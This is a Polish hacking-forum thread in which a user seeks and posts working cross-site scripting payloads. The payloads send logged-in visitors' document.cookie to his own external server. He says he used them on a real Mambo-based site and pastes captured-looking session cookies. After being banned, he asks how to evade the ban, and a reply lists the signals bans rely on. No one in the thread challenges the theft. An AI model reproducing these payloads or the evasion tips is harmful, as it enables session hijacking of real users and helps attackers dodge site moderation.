Pokaż wyniki 1 do 8 z 8

Temat: wysyłanie ciastka get'em- problem

  1. #1
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie wysyłanie ciastka get'em- problem

    siema
    od razu do rzeczy..
    wiecie jak wysłać cookie metodą get? musze tak spreferować linka by naprzyklad
    http://www.adresjakistam.pl/ciastko.php?ciastko=( i tu ma być ten cookies)

    juz probowalem duzo rzeczy ale nieidzie

    a dokladniej chce zrobić tak <img src="http://www.jakisadres.pl/ciastko.php?ciastko=( i tu te ciastko ma być);">

    prosze o pomoc
    Ostatnio edytowane przez ironwall : 11-09-2007 - 16:55

  2. #2
    Avatar Nikow
    Nikow jest offline -=[ZRP]=-
    Zarejestrowany
    Sep 2007
    Skąd
    Różne zakątki sieci.
    Postów
    995

    Domyślnie

    Ciastko getem? Czyli parametry ciastka przekazujesz GET'em? Zobacz jak się robi ciasteczko w PHP (setcookie bodajrze) i zobacz jakie parametry przyjmuje, później napisz skrypt który z tablicy $_GET pobierze odpowiednie dane, podstawi je pod odpowiednie pola i to cała filozofia...

  3. #3
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    nie oto mi chodzi....
    ok opisze problem
    więc jest witryna na ktorej moge wstawić kod html
    i chce tam wstawic taki kod zeby wysylal ciasteczka uzytkownika zalogowanego
    ja nie mam zamiaru wstawiać ciasteczka .

    edit dobra mam juz to oco mi chodzilo....
    videoart unknowa mi pomog

    <script><img src='http://moj adres.pl/ciastko.php?ciastko='%2Bescape(document.cookie);></script>
    sory to jednak niedziala ale to dziala
    <script>self.location.href='http://www.adres.yoyo.pl/ciastko.php?ciastko='%2Bescape(document.cookie); history.back()</script>

    ##############################################

    dobra nastepne pytanie bo niechce mi sie zakladac nowego tematu ....
    czy da sie cos zrobic z ciasteczkiem ktory zawiera tylko numery sesji itym podobne
    przykladowe ciacho

    sboard_settings[member_id]=312; sboard_settings[current_view]=flat; sboard_settings[prevvisit]=1194628919; sessioncookie=cd59a35655ac717d8a2a425e76c9a67e; mosvisitor=1; PHPSESSID=674e0c23dca6d59f85e379ea7aa6a152

    albo jeszcze inne bardziej proste
    sessioncookie=4b4493217579c1246538a7382b57065f; mosvisitor=1


    da sie przez to naprzyklad jakos odczytac haslo usera albo chociaz samą nazwe uzytkownika?/?
    hmmm
    Ostatnio edytowane przez ironwall : 11-09-2007 - 19:35

  4. #4
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Przez to nie bo to ID sesji w Mambo o ile sie nie myle
    Tam jedyne co jest to ID sesji w ciachu i koniec - reszta w bazie danych.
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  5. #5
    Zarejestrowany
    Jan 2007
    Skąd
    somewhere in time
    Postów
    510

    Domyślnie

    dobra mam jeszcze jedno pytanie bo nielubie zakladac nowych tematow
    hmmm więc dostalem bana na ktorych wykonalem ten kod co podalem wyzej nie moge juz sie logowac ani nawet zakladac nowego konta
    wsumie niepotrzebnie pisalem na forum i podawalem urla przez ktorego byly wysylane do mnie ciastka i to był bląd bo moglem po cichu ale cóż....czlowiek uczy sie na blendach..
    a więc zostalem zbanowany i niewiem wogole na czym taki ban polega
    usunąlem kukizy i zmienilem ip
    nawet nowego konta nie moge zalozyc
    niemam pojęcia na czym taki ban polega. prosze o wytlumaczenie
    ps.. tak to jest mambo

    edit dobra sory wystarczylo zmienic przegladarke więc widocznie to sie gdzies zapisuje w plikach jakis
    Ostatnio edytowane przez ironwall : 11-10-2007 - 15:26

  6. #6
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Mambo i Joomla posiada kilka fajnych komponentow do banowania Nie analizowalem jak dzialaja ale niektore leca po IP, inne robia to jeszcze jakos inaczej ale jak to mnie nie pytaj - nie uzywalem...
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  7. #7
    Zarejestrowany
    Jan 2007
    Postów
    695

    Domyślnie

    iron - czlowiek uczy sie na banach, nie bledach
    a tqm wiesz moze po czym jeszcze leca bany? IP, przeglądarka co jesszcze?
    Nie chodzi zebys opisywal tylko podał metody. wiesz moze?
    Zbliża się Trollmagedon...

  8. #8
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    IP, ISP, region geograficzny, cookie, przegladarka, pewne warianty zachowania ale to juz trudniejsza sprawa... lub kombinacja nawet wszystkich powyzszych :P
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Podobne wątki

  1. pakiety TCP, UDP, echo, tworzenie i wysyłanie
    By gogulas in forum TCP/IP/Analiza/Badanie
    Odpowiedzi: 22
    Autor: 10-06-2007, 10:34
  2. Cafeini - wysyłanie maila
    By pierzu in forum Wirusy/Konie trojańskie
    Odpowiedzi: 1
    Autor: 09-30-2007, 17:19

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj